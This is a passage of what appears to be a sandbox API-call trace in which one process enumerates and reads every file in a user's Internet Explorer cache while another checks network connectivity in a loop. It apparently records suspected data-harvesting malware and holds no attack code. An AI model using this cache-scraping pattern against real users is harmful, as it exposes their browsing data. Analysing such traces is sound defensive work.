FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\xb08,\x8dX\x94\xcf\x01\xe0o\xa69\xd5I\xcd\x01P\xa5o\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00p\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01 h\xc4\x8aX\x94\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x009\x003\x00D\x004\x00Q\x00A\x00H\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:50,367 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:50,447 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:50,447 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01 h\xc4\x8aX\x94\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00/ 2 6 p\x00\x00\x00\x00\x00\x00\x00\x10\xf1L]\xe0\x91\xcf\x01\xf0b\xce\x89X\x94\xcf\x01@xN]\xe0\x91\xcf\x01@xN]\xe0\x91\xcf\x01)\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x10\x001\x005\x008\x001\x005\x00_\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x001\x005\x008\x001\x005\x00[\x001\x00]\x00: \xa8\x00\x00\x00\x00\x00\x00\x00`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01`b\xcc\xef\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:50,447 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\15815[1] DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,447 | 504 | NtReadFile |
Buffer => var bk_results = {
"campaigns": [
]
};
FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,447 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,447 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\activityi;src=2542116;type=clien612;cat=chromx;ord=5776331011308[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,447 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><div style="display:inline;">
<img height="1" width="1" style="border-style: FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,457 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,467 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xa0yc\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01\xd0\xcc\xc6\x86\xe6\x91\xcf\x01"\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00C\x00C\x00E\x007\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00l\x00e\x00f\x00t\x00[\x003\x00]\x00.\x00p\x00n\x00g\x00N]\xe0\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00\xc0\x8a\x9d\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01P\x06\xd3\x86\xe6\x91\xcf\x01"\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00C\x000\x00F\x007\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00l\x00e\x00f\x00t\x00[\x004\x00 |
SUCCESS | 0x00000000 | |
| 07:44:50,467 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\eula_text[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,467 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,647 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:50,647 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:50,647 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:50,647 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:50,647 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:50,697 | 504 | NtReadFile |
Buffer => <p>
Google Chrome may include one or more components provided by Adobe Systems Incorporated
and Adobe Software Ireland Limited (collectively \xe2\x80\x9cAdobe\xe2\x80\x9d). Your use of the Adobe software
as provided by Google (\xe2\x80\x9cAdobe So FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,757 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,767 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,767 | 504 | NtReadFile |
Buffer => window.google.ac.h(["c",[["c\u003cb\u003eraigslist\u003c\/b\u003e",0],["c\u003cb\u003eraigslist baltimore\u003c\/b\u003e",0],["c\u003cb\u003enn\u003c\/b\u003e",0],["c\u003cb\u003eomcast\u003c\/b\u003e",0],["c\u003cb\u003eapital one\u003c\/b\u003e",0],["c\u FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,767 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,767 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,767 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom",[["chrom\u003cb\u003ee\u003c\/b\u003e",0],["chrom\u003cb\u003eecast\u003c\/b\u003e",0],["chrom\u003cb\u003eecast apps\u003c\/b\u003e",0],["chrom\u003cb\u003ee store\u003c\/b\u003e",0],["chrom\u003cb\u003eebook\u003c\/b\u003e",0] FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,767 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,767 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\google[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,767 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta content="Search the world's information, including webpages, images, videos and more. Google has FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,818 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,828 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => x\x00\x00\x00\x00\x00\x00\x00p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01\xe3\x16\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x18\x00J\x00A\x00M\x00_\x001\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00j\x00a\x00m\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00t\x00[\x003\x00\x90\x00\x00\x00\x00\x00\x00\x00@\xfb\xf6\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01\xb3k\x01\x00\x00\x00\x00\x00\x00p\x01\x00\x00\x00\x00\x00 \x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x16\x00J\x00Q\x00U\x00E\x00R\x00Y\x00~\x001\x00.\x00J\x00S\x00\x00\x00j\x00q\x00u\x00e\x00r\x00y\x00-\x001\x00.\x001\x000\x00.\x002\x00.\x00m\x00i\x00n\x00[\x001\x00]\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:50,828 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,828 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,888 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:50,888 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\msn[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,888 | 504 | NtReadFile |
Buffer => <!DOCTYPE html><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">/*<![CDATA[*/if(self!=top){try{top.location.replace( FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,938 | 504 | NtReadFile |
Buffer => v class="br br1"><div class="img"><img src="http://col.stb01.s-msn.com/i/65/CDAB2F44A1591D2B308C20C6C15375.jpg" width="972" height="118" alt="" /></div></div></div><div id="fbtwh2" class="co2b1 cf co coa2 coc1 m3 en-us1"><input type="hidden" value="{" FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:50,998 | 504 | NtReadFile |
Buffer => psonville, MD</a><span class="loctog1"><a class="mapit opennew" href="http://www.bing.com/maps/?where1=Simpsonville, MD&FORM=MSNHPM">Get Directions</a></span></h3><div class="weahr"> </div><div class="weaheading cf"><h4><a href="http://local.msn.com/w FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,128 | 504 | NtReadFile |
Buffer => How a gas tax hike would slam the economy</a></div></li><li><div class="img"><a href="http://money.msn.com/saving-money-tips/post--americas-least-favorite-fast-food-restaurants"><span class="lli"><!--<img src="http://col.stb00.s-msn.com/i/DD/67E06F5349702B FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,188 | 504 | NtReadFile |
Buffer => s="advertisement"><div id="idShowcaseAd"><script type="text/javascript">Msn.dap("&PG=MSNREC&AP=1089",300,250,"idShowcaseAd",1,0);</script></div></div></div></div></div></div><div class="ro"><div class="ce ce1 cel w4"><div id="ca2_hml" class="co1b1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,258 | 504 | NtReadFile |
Buffer => 3%",configName:"divoverlayplayer",configCsid:"msnvideo"}}),$("div.pgopt1").async("scrollBind",["pageOptions",[{delay:{open:100,close:100}}]]),$("div.facebook").async("scrollBind",["socialActivityList",[{serviceName:"facebook",tabSet:"wft"}]]),$("div.twitte FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,258 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,268 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\msn[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,268 | 504 | NtReadFile |
Buffer => <!DOCTYPE html><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><div id="wrapper"><div id="head"><div class="pa w12"><div class="ro"><div class="ce ce1 cel w12"></div></div><div class="ro"><div class="ce ce1 cel w12" FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,318 | 504 | NtReadFile |
Buffer => arez-banned-from-all-soccer-for-4-months-062614">Soccer star banned for biting</a></li><li><a class="gt1-51501" href="http://news.msn.com/us/massachusetts-to-raise-minimum-wage-to-highest-of-any-us-state">State sets $11 minimum wage</a></li><li><a class="g FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,378 | 504 | NtReadFile |
Buffer => :15</span></li><li><h4><a href="http://movies.msn.com/movies/movie.aspx?m=2398182&shloc={0}">X-Men: Days of Future Past</a></h4><span>PG13, 2hr 10min</span><span class="time">3:20, 6:40</span></li><li><h4><a href="http://movies.msn.com/movies/movie/the FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,438 | 504 | NtReadFile |
Buffer => v-shows-that-axed-major-characters/feature/photo-gallery">Photo Gallery on MSN TV</a></div></li><li><div class="img"><a href="http://money.msn.com/investing/c_galleryregular.aspx?cp-documentid=253818720"><span class="lli"><!--<img src="http://col.stb00.s-m FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,448 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:51,448 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:51,448 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x001728f0 | |
| 07:44:51,448 | 1308 | OpenServiceW |
ServiceControlManager => 0x001728f0 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x001728c8 | |
| 07:44:51,448 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:51,448 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:51,448 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:51,499 | 504 | NtReadFile |
Buffer => amp; share what's on your mind</span></div></div></div><div class="ac-load none ac-updatestatus">Please wait.<br />This may take a few seconds</div><div class="ac-error none ac-head ac-errortext">Unable to show activities. Please try again later.</div></di FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,499 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,509 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\sck[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,509 | 504 | NtReadFile |
Buffer => <iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dB296FC53E9F3449189F55A6013617F38%3b&h=3f0c1649-bbc4-6a5c-b3fd-0f4b3e63afed" height="0" width="0" frameborder="0"></iframe> FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,509 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,509 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\search[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,509 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/google_favicon_128.png" itemprop="image"><title>chrome - Google Search</title>< FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,559 | 504 | NtReadFile |
Buffer => YikhBCgAf31yPYDyAEBqgQZT9BRfwM8mYVuGG7PjHlIgcKI5PxKrR5vBtIGCxCZqE4Y-d-0CSgBgAfribcJkAcD&sig=AOD64_3xefpKwW_lyMyJMYYSh_3itj0hnQ&adurl=http://clickserve.dartsearch.net/link/click%3Flid%3D43700001627736273%26ds_s_kwgid%3D58700000192879284%26ds_e_adid% FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,609 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,609 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xd0\xb4\xb0\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x81>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00M\x00E\x00M\x00A\x00~\x001\x00.\x00J\x00P\x00G\x00t\x00i\x00m\x00e\x00m\x00a\x00c\x00h\x00i\x00n\x00e\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00\xf6\xf3\xdf\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00@\x01\xc6\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xf1\xb3\x01\x00\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00M\x00E\x00M\x00A\x00~\x001\x00.\x00P\x00N\x00G\x00t\x00i\x00m\x00e\x00m\x00a\x00c\x00h\x00i\x00n\x00e\x00[\x001\x00 |
SUCCESS | 0x00000000 | |
| 07:44:51,609 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\ttj[1].aspx%3Fid%3D5555&bdtop=false&bdifs=2 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,609 | 504 | NtReadFile |
Buffer => document.write('<a href="http://nym1.ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAOxRuB6F67E_AAAAAAAAAAAAAAAAAAAAAJFWfUYX8D8tD00NRcHkLXl6uKxTAAAAAAkFGADlBQAA5QUAAAIAAACN7dwAXB0EAAAAAQBVU0QAVVNEALQAlgAIogAAJ68AAgMAAQIAAIgAvRa_4wAAAAA./cnd=%216gYLQgi68-ABEI3b8wYY FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,609 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,619 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:51,619 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:51,699 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01@\xd2G\x8bX\x94\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00m\x00e\x00m\x00\xb0\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x18\x000\x000\x000\x000\x000\x000\x00~\x001\x00.\x00G\x00I\x00F\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x00_\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x007\x00 |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=8410154719303[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Google Code for PXL - Chrome - Homepage - Visit p30d -->
<script type=" FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,699 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xc0C\x91d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01&\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00T\x00T\x00O\x00N\x00~\x004\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00r\x00i\x00g\x00h\x00t\x00[\x002\x00]\x00.\x00p\x00n\x00g\x00\xdf\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00 \x99\xa0\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01&\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x005\x007\x007\x002\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00r\x00i\x00g\x00h\x00t\x00[\x00 |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,699 | 504 | NtReadFile |
Buffer => (function(){var h=this,ba=function(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if("[object Window]"==c)return"object";if("[object Array]"==c||"number"==t FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,759 | 504 | NtReadFile |
Buffer => his,a),this.s="v"):b.Rb?(this.F="c",vd(this,a),this.s="i"):b.ca&&(this.F="l",vd(this,a),this.s="i")};var vd=function(a,b){b.clearInterval(a.W);a.W=null;a.va=!1;a.w&&wc(a.w)},od=function(a,b,c){a.I=b.setInterval(D("osd_or_lidar::adblock::iem_int",s(a.ec,a,b FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,789 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,789 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,789 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chr",[["chr\u003cb\u003eome\u003c\/b\u003e",0],["chr\u003cb\u003eis brown\u003c\/b\u003e",0],["chr\u003cb\u003eomecast\u003c\/b\u003e",0],["chr\u003cb\u003eis davis\u003c\/b\u003e",0],["chr\u003cb\u003eomecast apps\u003c\/b\u003e",0],[ FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:51,789 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:51,789 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[4].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
